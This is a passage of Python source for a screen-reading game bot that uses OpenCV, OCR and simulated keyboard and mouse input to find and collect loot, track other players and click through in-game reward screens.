0x0002, 0, 0, 0, 0)
time.sleep(0.05)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
# pydirectinput.click(
# int(1263+game_wincap.window_rect[0]), int(64+game_wincap.window_rect[1]))
def close_map(game_wincap=False):
if not game_wincap:
with open("gamename.txt") as f:
gamename = f.readline()
game_wincap = WindowCapture(gamename)
pydirectinput.click(
int(859+game_wincap.window_rect[0]), int(260+game_wincap.window_rect[1]))
def close_esc_menu(game_wincap=False):
if not game_wincap:
with open("gamename.txt") as f:
gamename = f.readline()
game_wincap = WindowCapture(gamename)
pydirectinput.click(
int(749+game_wincap.window_rect[0]), int(280+game_wincap.window_rect[1]))
def get_monitor_scaling():
scaleFactor = ctypes.windll.shcore.GetScaleFactorForDevice(0) / 100
return float(scaleFactor)
def grab_res_scroll_left(gamename):
wincap = WindowCapture(gamename, [112, 130, 125, 143])
image = wincap.get_screenshot()
filter = HsvFilter(0, 0, 0, 179, 18, 255, 0, 0, 0, 0)
image = BotUtils.apply_hsv_filter(image, filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=1234567890'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
return int(result)
def read_mission_name(gamename):
wincap = WindowCapture(gamename, [749, 152, 978, 170])
image = wincap.get_screenshot()
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
return result
def convert_click_to_ratio(gamename, truex, truey):
wincap = WindowCapture(gamename)
wincap.update_window_position(border=False)
scaling = BotUtils.get_monitor_scaling()
# print(scaling)
relx = (truex - (wincap.window_rect[0] * scaling))
rely = (truey - (wincap.window_rect[1] * scaling))
# print("relx, rely, w, h: {},{},{},{}".format(
# relx, rely, wincap.w, wincap.h))
ratx = relx/(wincap.w * scaling)
raty = rely/(wincap.h * scaling)
return ratx, raty
def convert_ratio_to_click(ratx, raty, gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename)
relx = int(ratx * wincap.w)
rely = int(raty * wincap.h)
truex = int((relx + wincap.window_rect[0]))
truey = int((rely + wincap.window_rect[1]))
return truex, truey
def convert_true_to_window(gamename, truex, truey):
scaling = BotUtils.get_monitor_scaling()
wincap = WindowCapture(gamename)
relx = (truex/scaling) - wincap.window_rect[0]
rely = (truey/scaling) - wincap.window_rect[1]
return relx, rely
def convert_window_to_true(gamename, relx, rely):
wincap = WindowCapture(gamename)
truex = int(relx + wincap.window_rect[0])
truey = int(rely + wincap.window_rect[1])
return truex, truey
def find_other_player(gamename, all=False):
othr_plyr_vision = Vision("otherplayerinvert.jpg")
othr_plyr_wincap = WindowCapture(gamename, [1100, 50, 1260, 210])
image = othr_plyr_wincap.get_screenshot()
filter = HsvFilter(24, 194, 205, 31, 255, 255, 0, 0, 0, 0)
image = cv2.blur(image, (4, 4))
image = BotUtils.filter_blackwhite_invert(filter, image)
rectangles = othr_plyr_vision.find(
image, threshold=0.61, epsilon=0.5)
points = othr_plyr_vision.get_click_points(rectangles)
if len(points) >= 1:
if not all:
relx = points[0][0] - 0
rely = 0 - points[0][1]
return relx, rely
else:
return points
return False
def find_enemy(gamename, all=False):
othr_plyr_vision = Vision("otherplayerinvert.jpg")
othr_plyr_wincap = WindowCapture(gamename, [1100, 50, 1260, 210])
image = othr_plyr_wincap.get_screenshot()
filter = HsvFilter(0, 198, 141, 8, 255, 255, 0, 0, 0, 0)
image = cv2.blur(image, (4, 4))
image = BotUtils.filter_blackwhite_invert(filter, image)
rectangles = othr_plyr_vision.find(
image, threshold=0.41, epsilon=0.5)
points = othr_plyr_vision.get_click_points(rectangles)
if len(points) >= 1:
if not all:
relx = points[0][0] - 0
rely = 0 - points[0][1]
return relx, rely
else:
return points
return False
def find_midlevel_event(rect=False, gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
if not rect:
rect = [1100, 50, 1260, 210]
filter = HsvFilter(76, 247, 170, 100, 255, 255, 0, 0, 0, 0)
vision = Vision("otherplayerinvert.jpg")
wincap = WindowCapture(gamename, rect)
image = wincap.get_screenshot()
image = cv2.blur(image, (4, 4))
image = BotUtils.filter_blackwhite_invert(filter, image)
rectangles = vision.find(
image, threshold=0.61, epsilon=0.5)
points = vision.get_click_points(rectangles)
if len(points) >= 1:
return points[0][0], points[0][1]
return False, False
def stop_movement(follower=False):
if follower:
follower.pressed_keys = []
KEYS = {
'left': 37,
'up': 38,
'right': 39,
'down': 40
}
for key in ["up", "down", "left", "right"]:
# result = ctypes.windll.user32.GetKeyState(KEYS[key])
# if result != 0 and result != 1:
CustomInput.release_key(CustomInput.key_map[key], key)
def check_up_down_pressed():
result1 = ctypes.windll.user32.GetKeyState(38)
if result1 not in [0, 1]:
result2 = ctypes.windll.user32.GetKeyState(40)
if result2 not in [0, 1]:
return True
return False
class Looting:
def loot_current_room(gamename, player_name, search_points=False):
# Start by picking up loot already in range
BotUtils.close_map_and_menu(gamename)
Looting.grab_nearby_loot(gamename)
# Then try grabbing all visible far loot
Looting.grab_all_visible_loot(gamename, player_name)
# Then once that is exhausted cycle through the searchpoints
if search_points:
for point in search_points:
x, y, first_dir = point
BotUtils.move_to(gamename, x, y, yfirst=first_dir == "y")
Looting.grab_nearby_loot(gamename)
BotUtils.close_map_and_menu(gamename)
Looting.grab_all_visible_loot(gamename, player_name)
def grab_nearby_loot(gamename):
count = 0
while BotUtils.detect_xprompt(gamename):
if count > 12:
break
pydirectinput.press("x")
count += 1
time.sleep(0.09)
CustomInput.press_key(CustomInput.key_map["right"], "right")
CustomInput.release_key(CustomInput.key_map["right"], "right")
def grab_all_visible_loot(gamename, player_name=False):
start_time = time.time()
while True:
if time.time() - start_time > 20:
break
outcome = Looting.try_find_and_grab_loot(
gamename, player_name)
if outcome == "noloot":
break
elif outcome == "noplayer":
pydirectinput.press("right")
outcome = Looting.try_find_and_grab_loot(
gamename, player_name)
if outcome == "noplayer":
break
elif outcome == "falsepos":
break
elif outcome == True:
count = 0
while BotUtils.detect_xprompt(gamename):
if count > 12:
break
pydirectinput.press("x")
count += 1
time.sleep(0.09)
def grab_all_visible_lootv2(gamename=False, player_name=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
start_time = time.time()
while True:
if time.time() - start_time > 20:
break
outcome = Looting.try_find_and_grab_lootv2(
gamename, player_name)
BotUtils.stop_movement()
if outcome == "noloot":
break
elif outcome == "noplayer":
pydirectinput.press("right")
outcome = Looting.try_find_and_grab_lootv2(
gamename, player_name)
if outcome == "noplayer":
break
elif outcome == "falsepos":
break
elif outcome == True:
count = 0
while BotUtils.detect_xprompt(gamename):
if count > 12:
break
pydirectinput.press("x")
count += 1
time.sleep(0.23)
if Looting.check_for_nearby_obscured_loot(gamename):
Looting.grab_obscured_loot(gamename)
def grab_obscured_loot(gamename):
CustomInput.press_key(CustomInput.key_map["up"], "up")
start = time.time()
check_again = False
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.003)
if time.time() - start > 0.5:
check_again = True
break
CustomInput.release_key(CustomInput.key_map["up"], "up")
count = 0
while BotUtils.detect_xprompt(gamename):
if count > 12:
break
pydirectinput.press("x")
count += 1
time.sleep(0.23)
if check_again:
Looting.grab_all_visible_lootv2(gamename)
def check_for_loot(gamename):
# This will be a lightweight check for any positive loot ident
# Meant to be used when moving and normal looting has ceased
# i.e. opportunistic looting
data = Looting.grab_farloot_locations(
gamename, return_image=True)
if not data:
return False
else:
loot_list, image, xoff, yoff = data
confirmed = False
try:
for _, coords in enumerate(loot_list):
x, y = coords
x -= xoff
y -= yoff
rgb = image[y-22:y+22, x-75:x+75]
filter = HsvFilter(0, 0, 131, 151, 255, 255, 0, 0, 0, 0)
rgb = BotUtils.apply_hsv_filter(rgb, filter)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
if len(result) > 3:
return True
except:
return False
if not confirmed:
return False
def check_for_lootv2(gamename=False):
# Improved version of the original check for loot function
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
if Looting.check_for_nearby_obscured_loot(gamename):
return True
else:
result = Looting.grab_farloot_locationsv2(gamename)
if not result:
return False
return True
def grab_farloot_locationsv3(gamename=False, rect=False):
# Slower version of grab farloot locations v2
# Checks for signature edges of loot tag
# Useful for verification due to 100% accuracy
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
vision = Vision("lootside2.jpg")
if not rect:
rect = [5, 80, 1273, 776]
wincap = WindowCapture(gamename, rect)
screenshot = wincap.get_screenshot()
original_image = screenshot
rectangles = vision.find(
original_image, threshold=0.81, epsilon=0.5)
if len(rectangles) < 1:
# Need to check other side
vision = Vision("lootside.jpg")
wincap = WindowCapture(gamename, rect)
screenshot = wincap.get_screenshot()
original_image = screenshot
rectangles = vision.find(
original_image, threshold=0.81, epsilon=0.5)
if len(rectangles) < 1:
return False
else:
points = []
for (x, y, w, h) in rectangles:
x += rect[0]
y += rect[1]
center_x = x + int(w/2) + 81
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
else:
points = []
for (x, y, w, h) in rectangles:
x += rect[0]
y += rect[1]
center_x = x + int(w/2) - 81
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
def check_for_nearby_obscured_loot(gamename):
# This checks for loot which wouldn't be detected by the normal function
# which is typically going to be loot that is directly behind player name
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
result = Looting.grab_farloot_locationsv3(
gamename, [510, 349, 775, 500])
if not result:
return False
return True
def grab_farloot_locationsv2(gamename=False, rect=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
if not rect:
rect1 = [5, 80, 1273, 776]
wincap = WindowCapture(gamename, rect1)
else:
wincap = WindowCapture(gamename, rect)
vision = Vision("doublelootline.jpg")
screenshot = wincap.get_screenshot()
original_image = cv2.blur(screenshot, (80, 1))
lootbox_thresh1 = cv2.inRange(original_image, np.array(
[0, 19, 30]), np.array([1, 20, 37]))
lootbox_thresh2 = cv2.inRange(original_image, np.array(
[5, 19, 27]), np.array([9, 23, 31]))
combined_mask = lootbox_thresh2 + lootbox_thresh1
combined_mask_inv = 255 - combined_mask
combined_mask_rgb = cv2.cvtColor(combined_mask_inv, cv2.COLOR_GRAY2BGR)
final = cv2.max(original_image, combined_mask_rgb)
rectangles = vision.find(
final, threshold=0.87, epsilon=0.5)
if len(rectangles) < 1:
return False
points = []
for (x, y, w, h) in rectangles:
# Account for the rect
if rect:
# Account for the rect
x += rect[0]
y += rect[1]
else:
x += rect1[0]
y += rect1[1]
center_x = x + int(w/2)
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
def move_loot_diagonal(true_coords, relcoords, rect=False, gamename=False, seek=True):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
truex, truey = true_coords
lastx, lasty = true_coords
relx, rely = relcoords
# Calculate roughly how long expect to travel
expect_x = abs(relx/300)
expect_y = abs(rely/450)
# Then figure out which directions need to travel and how long
mult = 0.707
if relx > 0:
keyx = "left"
#CustomInput.press_key(CustomInput.key_map["left"], "left")
timeleftx = float("{:.4f}".format(abs(expect_x*mult)))
elif relx < 0:
keyx = "right"
#CustomInput.press_key(CustomInput.key_map["right"], "right")
timeleftx = float("{:.4f}".format(abs(expect_x*mult)))
else:
keyx = "right"
timeleftx = 0
mult = 1
if rely > 0:
keyy = "down"
#CustomInput.press_key(CustomInput.key_map["down"], "down")
timelefty = float("{:.4f}".format(abs(expect_y*mult)))
elif rely < 0:
keyy = "up"
#CustomInput.press_key(CustomInput.key_map["up"], "up")
timelefty = float("{:.4f}".format(abs(expect_y*mult)))
else:
keyy = "up"
timelefty = 0
if relx != 0:
timeleftx = float("{:.4f}".format(abs(expect_x)))
else:
return False
# Then figure out roughly which direction will finish first
closer = min([timeleftx, timelefty])
further = max([timeleftx, timelefty])
# first_key = [keyx, keyy][[timeleftx, timelefty].index(closer)]
second_key = [keyx, keyy][[timeleftx, timelefty].index(further)]
if closer < 0.05:
# If both tiny then return false
if further < 0.05:
# print("Both were very close")
BotUtils.stop_movement()
return False
# Otherwise need to just travel in second direction
# Effectively just using the old straightline method
# Do this to make it clear which direction being sorted
require_seek = False
if further == timeleftx:
# print("Travelled in x dir only")
CustomInput.press_key(
CustomInput.key_map[second_key], second_key)
last_loop = time.time()
total_frames = 0
avg_x_speed = 100
time_remaining = further
last_detect = time.time()
zero_speed_framesx = 0
start_time = time.time()
while not BotUtils.detect_xprompt(gamename):
if time.time() - start_time > 5:
BotUtils.stop_movement()
require_seek = True
break
time.sleep(0.003)
loop_time = time.time() - last_loop
last_loop = time.time()
try:
newx, newy = Looting.grab_farloot_locationsv2(gamename, rect)[
0]
last_detect = time.time()
total_frames += 1
movementx = lastx - newx
speedx = movementx/loop_time
totalx = truex - newx
percentx = abs(totalx)/abs(relx)
if percentx > 1:
# print("Percent x was {}".format(percentx))
BotUtils.stop_movement()
require_seek = True
break
if movementx == 0:
zero_speed_framesx += 1
if zero_speed_framesx > 8:
BotUtils.stop_movement()
require_seek = True
elif total_frames == 2:
zero_speed_framesx = 0
if speedx != 0:
avg_x_speed = speedx
else:
total_frames -= 1
else:
zero_speed_framesx = 0
avg_x_speed = (
total_frames*avg_x_speed+speedx)/(total_frames+1)
time_remaining = abs(
(relx - relx*percentx)/avg_x_speed)
rect = [newx-100, newy-30, newx+100, newy+30]
lastx = newx
# print("successfully looping through x-dir only")
except:
time_remaining -= loop_time
if time_remaining < 0:
BotUtils.stop_movement()
require_seek = True
if time.time() - last_detect > 0.5:
# Release all keys
BotUtils.stop_movement()
return False
total_frames = 0
# Alternatively try handle the y case only
else:
# print("Travelled in y dir only")
CustomInput.press_key(
CustomInput.key_map[second_key], second_key)
last_loop = time.time()
total_frames = 0
avg_y_speed = 100
time_remaining = further
last_detect = time.time()
zero_speed_framesy = 0
start_time = time.time()
while not BotUtils.detect_xprompt(gamename):
if time.time() - start_time > 5:
BotUtils.stop_movement()
require_seek = True
break
# print("looping through y-dir only")
if BotUtils.check_up_down_pressed():
# print("Both keys pressed down #2")
CustomInput.release_key(
CustomInput.key_map["down"], "down")
time.sleep(0.003)
loop_time = time.time() - last_loop
last_loop = time.time()
try:
newx, newy = Looting.grab_farloot_locationsv2(gamename, rect)[
0]
last_detect = time.time()
total_frames += 1
movementy = lasty - newy
speedy = movementy/loop_time
totaly = truey - newy
percenty = abs(totaly)/abs(rely)
if percenty > 1:
BotUtils.stop_movement()
require_seek = True
break
if movementy == 0:
zero_speed_framesy += 1
if zero_speed_framesy > 8:
BotUtils.stop_movement()
require_seek = True
elif total_frames == 2:
zero_speed_framesy = 0
if speedy != 0:
avg_x_speed = speedy
else:
total_frames -= 1
else:
zero_speed_framesy = 0
avg_y_speed = (
total_frames*avg_y_speed+speedy)/(total_frames+1)
time_remaining = abs(
(rely - rely*percenty)/avg_y_speed)
rect = [newx-100, newy-30, newx+100, newy+30]
lasty = newy
except:
time_remaining -= loop_time
if time_remaining < 0:
BotUtils.stop_movement()
require_seek = True
if time.time() - last_detect > 0.5:
# Release all keys
BotUtils.stop_movement()
return False
total_frames = 0
# Finally if can't find it then search in both directions for y
if require_seek:
# print("A seek was required")
if not seek:
BotUtils.stop_movement()
return False
# Need to move up and down for 0.5sec each way checking for loot
start_time = time.time()
keyy = "up"
CustomInput.press_key(CustomInput.key_map[keyy], keyy)
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.003)
if time.time() - start_time > 0.4:
break
CustomInput.release_key(CustomInput.key_map[keyy], keyy)
if not BotUtils.detect_xprompt(gamename):
# Then move in opposite direction
start_time = time.time()
keyy = "down"
CustomInput.press_key(CustomInput.key_map[keyy], keyy)
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.003)
if time.time() - start_time > 0.8:
break
CustomInput.release_key(CustomInput.key_map[keyy], keyy)
# Then need to check no keys are still pressed again
BotUtils.stop_movement()
if BotUtils.detect_xprompt(gamename):
# print("Detected xprompt, pressed x")
pydirectinput.press("x")
return True
else:
# print("This is a 2-direction job")
# Need to start moving in the right direction
CustomInput.press_key(CustomInput.key_map[keyx], keyx)
CustomInput.press_key(CustomInput.key_map[keyy], keyy)
time_remaining = 0.3
avg_x_speed, avg_y_speed = [200, 200]
zero_speed_framesx = 0
zero_speed_framesy = 0
xfinished = False
total_frames = 0
y_stuck = False
require_seek = False
last_loop = time.time()
last_detect = time.time()
start_time = time.time()
while time_remaining > 0:
if time.time() - start_time > 5:
# BotUtils.stop_movement()
require_seek = True
break
if BotUtils.check_up_down_pressed():
# print("Both keys pressed down #3")
CustomInput.release_key(
CustomInput.key_map["down"], "down")
time.sleep(0.002)
if BotUtils.detect_xprompt(gamename):
break
loop_time = time.time() - last_loop
last_loop = time.time()
last_detect = time.time()
try:
total_frames += 1
newx, newy = Looting.grab_farloot_locationsv2(gamename, rect)[
0]
if not xfinished:
movementx = lastx - newx
# print("movementx = {}px".format(movementx))
speedx = movementx/loop_time
totalx = truex - newx
percentx = abs(totalx)/abs(relx)
if movementx == 0:
zero_speed_framesx += 1
# If too many zero speed frames, clearly stuck
if zero_speed_framesx >= 8:
CustomInput.release_key(
CustomInput.key_map[keyx], keyx)
xfinished = True
else:
zero_speed_framesx = 0
if percentx > 1:
xfinished = True
CustomInput.release_key(
CustomInput.key_map[keyx], keyx)
movementy = lasty - newy
if movementy == 0:
zero_speed_framesy += 1
# If too many zero speed frames, clearly stuck
if zero_speed_framesy >= 8:
CustomInput.release_key(
CustomInput.key_map[keyy], keyy)
y_stuck = True
require_seek = True
speedy = movementy/loop_time
totaly = truey - newy
percenty = abs(totaly)/abs(rely)
if y_stuck:
pass
elif percenty > 1 and xfinished:
require_seek = True
CustomInput.release_key(
CustomInput.key_map[keyy], keyy)
break
elif percenty > 1:
CustomInput.release_key(
CustomInput.key_map[keyy], keyy)
# And then update the ETA's based on speed
if not xfinished:
if total_frames > 1 and total_frames < 10:
if movementx == 0:
pass
elif total_frames == 2:
if speedx != 0:
avg_x_speed = speedx
else:
total_frames -= 1
else:
avg_x_speed = (
total_frames*avg_x_speed+speedx)/(total_frames+1)
x_remaining = abs((relx - relx * percentx)/avg_x_speed)
if not percenty > 1 or y_stuck:
if total_frames > 1 and total_frames < 10:
if movementy == 0:
pass
elif total_frames == 2:
if speedy != 0:
avg_y_speed = speedy
else:
total_frames -= 1
else:
avg_y_speed = (
total_frames*avg_y_speed+speedy)/(total_frames+1)
y_remaining = abs((rely - rely*percenty)/avg_y_speed)
else:
y_remaining = 0
time_remaining = max([x_remaining, y_remaining])
# And finally choose the next rectangle
rect = [newx-100, newy-30, newx+100, newy+30]
lastx = newx
lasty = newy
# print(speedx)
except:
time_remaining -= loop_time
if time_remaining < 0:
BotUtils.stop_movement()
return False
if time.time() - last_detect > 0.5:
# Release all keys
BotUtils.stop_movement()
return False
total_frames = 0
# Then need to check no keys left pressed
BotUtils.stop_movement()
# Then need to seek out loot if flag set
if require_seek:
# print("Required seek #2")
if not seek:
BotUtils.stop_movement()
return False
# Need to move up and down for 0.5sec each way checking for loot
start_time = time.time()
keyy = "up"
CustomInput.press_key(CustomInput.key_map[keyy], keyy)
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.003)
if time.time() - start_time > 0.4:
break
CustomInput.release_key(CustomInput.key_map[keyy], keyy)
# Then move in opposite direction
if not BotUtils.detect_xprompt(gamename):
# Then move in opposite direction
start_time = time.time()
keyy = "down"
CustomInput.press_key(CustomInput.key_map[keyy], keyy)
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.003)
if time.time() - start_time > 0.8:
break
CustomInput.release_key(CustomInput.key_map[keyy], keyy)
# Then need to check no keys are still pressed again
BotUtils.stop_movement()
if BotUtils.detect_xprompt(gamename):
# print("Detected xprompt #2")
BotUtils.stop_movement()
pydirectinput.press("x")
return True
BotUtils.stop_movement()
return False
def try_find_and_grab_lootv2(gamename=False, player_name=False, loot_lowest=True, allow_noplyr=True):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
# First need to close anything that might be in the way
BotUtils.close_map_and_menu(gamename)
# Then grab loot locations
loot_list = Looting.grab_farloot_locationsv2(gamename)
if not loot_list:
return "noloot"
# Then look for player
if player_name:
playerx, playery = BotUtils.grab_character_location(
player_name, gamename)
# If didn't find player then try once more
if not playerx:
playerx, playery = BotUtils.grab_character_location(
player_name, gamename)
if not playerx:
if not allow_noplyr:
return "noplayer"
else:
playerx, playery = [641, 387]
# Otherwise assume a standard player position
else:
playerx, playery = [641, 387]
# The decide whether to loot nearest or lowest
# Difference between first is faster,
# second less likely to miss loot by walking out of FOV
if not loot_lowest:
# Then convert lootlist to rel_pos list
relatives = BotUtils.convert_list_to_rel(
loot_list, playerx, playery, 150)
# Grab the indexes in ascending order of closesness
order = BotUtils.grab_order_closeness(relatives)
# Then reorder the lootlist to match
loot_list = [x for _, x in sorted(zip(order, loot_list))]
else:
# Grab the indexes in ascending order of distance from
# bottom of the screen
# print(loot_list)
loot_list.sort(key=lambda x: x[1], reverse=True)
# order = BotUtils.grab_order_lowest_y(loot_list)
# Then reorder the lootlist to match
# loot_list = [x for _, x in sorted(zip(order, loot_list))]
# print(loot_list)
true_coords = [loot_list[0][0], loot_list[0][1]]
# Now calculate relative loot position
relx = playerx - loot_list[0][0]
rely = loot_list[0][1] - playery - 150
# Grab the small rect for speed tracking
rect = [loot_list[0][0]-90, loot_list[0][1] -
30, loot_list[0][0]+90, loot_list[0][1]+30]
# Then send to dedicated function for diagonal looting run
return Looting.move_loot_diagonal(true_coords, [relx, rely], rect, gamename, True)
def try_find_and_grab_loot(gamename, player_name=False, loot_lowest=True, printout=False):
# First need to close anything that might be in the way
BotUtils.close_map_and_menu(gamename)
# Then grab loot locations
loot_list = Looting.grab_farloot_locations(gamename)
if not loot_list:
# print("No loot found")
return "noloot"
# else:
# print("Loot found")
if player_name:
playerx, playery = BotUtils.grab_character_location(
player_name, gamename)
# If didn't find player then try once more
if not playerx:
playerx, playery = BotUtils.grab_character_location(
player_name, gamename)
if not playerx:
return "noplayer"
else:
playerx, playery = [641, 387]
# print(loot_list)
# if want to always loot the nearest first despite the cpu hit
if not loot_lowest:
# Then convert lootlist to rel_pos list
relatives = BotUtils.convert_list_to_rel(
loot_list, playerx, playery, 275)
# Grab the indexes in ascending order of closesness
order = BotUtils.grab_order_closeness(relatives)
# Then reorder the lootlist to match
loot_list = [x for _, x in sorted(zip(order, loot_list))]
# Otherwise if want to loot from bottom of screen to top
# Typically better as see all loot then in y direction
# but potentially miss loot in x direction
else:
# Grab the indexes in ascending order of distance from
# bottom of the screen
order = BotUtils.grab_order_lowest_y(loot_list)
# Then reorder the lootlist to match
loot_list = [x for _, x in sorted(zip(order, loot_list))]
# print(loot_list)
confirmed = False
for index, coords in enumerate(loot_list):
# print("Found a possible match")
x, y = coords
wincap = WindowCapture(gamename, [x-70, y, x+70, y+40])
rgb = wincap.get_screenshot()
filter = HsvFilter(0, 0, 131, 151, 255, 255, 0, 0, 0, 0)
rgb = BotUtils.apply_hsv_filter(rgb, filter)
cv2.imwrite("testytest.jpg", rgb)
tess_config = '--psm 8 --oem 3 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
if len(result.replace(" ", "")) > 3:
if printout:
print(result)
confirmed = loot_list[index]
print("First method, {}".format(result.replace(" ", "")))
cv2.imwrite("C:\\Games\\first" +
str(random.randint(0, 10000))+".jpg", rgb)
break
else:
wincap = WindowCapture(gamename, [x-75, y-10, x+75, y+50])
rgb = wincap.get_screenshot()
filter = HsvFilter(0, 0, 131, 151, 255, 255, 0, 0, 0, 0)
rgb = BotUtils.apply_hsv_filter(rgb, filter)
# cv2.imwrite("testytest.jpg", rgb)
tess_config = '--psm 6 --oem 3 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
if len(result.replace(" ", "").replace("\n", "")) > 6:
confirmed = loot_list[index]
print("Second method, {}".format(
result.replace(" ", "").replace("\n", "")))
cv2.imwrite("C:\\Games\\second" +
str(random.randint(0, 10000))+".jpg", rgb)
break
if not confirmed:
# print("Lootname not confirmed or detected")
return "noloot"
# print(confirmed)
relx = playerx - confirmed[0]
rely = confirmed[1] - playery - 150
# print("relx:{}, rely:{}".format(-relx, -rely))
rect = [confirmed[0]-100, confirmed[1] -
30, confirmed[0]+100, confirmed[1]+30]
BotUtils.move_towards(relx, "x")
loop_time = time.time()
time_remaining = 0.1
time.sleep(0.01)
zero_speed_frames = 0
lastx = 89271
while time_remaining > 0:
# print("Looping during x travel")
time.sleep(0.003)
if BotUtils.detect_xprompt(gamename):
break
try:
newx, newy = Looting.grab_farloot_locations(gamename, rect)[
0]
time_taken = time.time() - loop_time
movementx = confirmed[0] - newx
speed = movementx/time_taken
# print(speed)
if newx == lastx:
zero_speed_frames += 1
if zero_speed_frames >= 8:
break
elif speed != 0:
time_remaining = abs(
relx/speed) - time_taken
rect = [newx-100, newy-30, newx+100, newy+30]
lastx = newx
except:
print("Can no longer detect loot")
try:
if time_remaining < 3:
time.sleep(time_remaining)
else:
time.sleep(abs(relx/100))
break
except:
return False
for key in ["left", "right"]:
CustomInput.release_key(CustomInput.key_map[key], key)
time.sleep(0.1)
for key in ["left", "right"]:
CustomInput.release_key(CustomInput.key_map[key], key)
BotUtils.move_towards(rely, "y")
start_time = time.time()
if rely < 0:
expected_time = abs(rely/300)
else:
expected_time = abs(rely/380)
# print("rely:{}px, travel time: {}s".format(rely, expected_time))
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.005)
# After moving in opposite direction
if time.time() - start_time > 10:
# If have moved opposite with no result for equal amount
if time.time() - start_time > 10 + 2*(1 + expected_time):
for key in ["up", "down"]:
CustomInput.release_key(CustomInput.key_map[key], key)
# Return falsepos so that it will ignore this detection
return "falsepos"
# If no result for 3 seconds
elif time.time() - start_time > 1 + expected_time:
# Try moving in the opposite direction
for key in ["up", "down"]:
CustomInput.release_key(CustomInput.key_map[key], key)
BotUtils.move_towards(-1*rely, "y")
start_time -= 8.5
# print("Expected:{}s, actual:{}s".format(
# expected_time, time.time()-start_time))
for key in ["up", "down"]:
CustomInput.release_key(CustomInput.key_map[key], key)
pydirectinput.press("x")
return True
def grab_farloot_locations(gamename=False, rect=False, return_image=False):
if gamename:
if not rect:
rect1 = [100, 160, 1092, 695]
wincap = WindowCapture(gamename, rect1)
else:
wincap = WindowCapture(gamename, rect)
original_image = wincap.get_screenshot()
else:
original_image = cv2.imread(os.path.dirname(
os.path.abspath(__file__)) + "/testimages/lootscene.jpg")
filter = HsvFilter(15, 180, 0, 20, 255, 63, 0, 0, 0, 0)
output_image = BotUtils.filter_blackwhite_invert(
filter, original_image, True, 0, 180)
# cv2.imwrite("testytest2.jpg", output_image)
# cv2.imwrite("C:\\Games\\" +
# str(random.randint(0, 10000))+".jpg", output_image)
output_image = cv2.blur(output_image, (8, 1))
output_image = cv2.blur(output_image, (8, 1))
output_image = cv2.blur(output_image, (8, 1))
_, thresh = cv2.threshold(output_image, 127, 255, 0)
contours, _ = cv2.findContours(
thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
if len(contours) < 2:
return False
contours.pop(0)
rectangles = []
for contour in contours:
(x, y), _ = cv2.minEnclosingCircle(contour)
rectangles.append([x-50, y, 100, 5])
rectangles.append([x-50, y, 100, 5])
rectangles, _ = cv2.groupRectangles(
rectangles, groupThreshold=1, eps=0.9)
if len(rectangles) < 1:
return False
points = []
for (x, y, w, h) in rectangles:
# Account for the rect
if rect:
# Account for the rect
x += rect[0]
y += rect[1]
else:
x += 100
y += 135
center_x = x + int(w/2)
center_y = y + int(h/2)
points.append((center_x, center_y))
if return_image:
if rect:
return points, original_image, rect[0], rect[1]
else:
return points, original_image, rect1[0], rect1[1]
return points
class Events:
def choose_random_reward(gamename):
wincap = WindowCapture(gamename)
posx = wincap.window_rect[0] + (460+(180*random.randint(0, 2)))
posy = wincap.window_rect[1] + (200+(132*random.randint(0, 3)))
pydirectinput.click(int(posx), int(posy))
time.sleep(0.1)
# Now accept the reward
pydirectinput.click(
wincap.window_rect[0]+750, wincap.window_rect[1]+720)
# And then perform clicks a second time just in case
time.sleep(0.1)
pydirectinput.click(int(posx), int(posy))
time.sleep(0.1)
pydirectinput.click(
wincap.window_rect[0]+750, wincap.window_rect[1]+720)
def detect_reward_choice_open(gamename):
wincap = WindowCapture(gamename, [503, 90, 535, 92])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a + d > 400:
if b + e > 500:
if c + f < 105:
return True
return False
def detect_move_reward_screen(gamename):
wincap = WindowCapture(gamename, [581, 270, 593, 272])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a + d > 360 and a + d < 400:
if b + e > 360 and b + e < 400:
if c + f < 10:
return True
return False
def detect_endlevel_chest(gamename):
wincap = WindowCapture(gamename, [454, 250, 525, 252])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
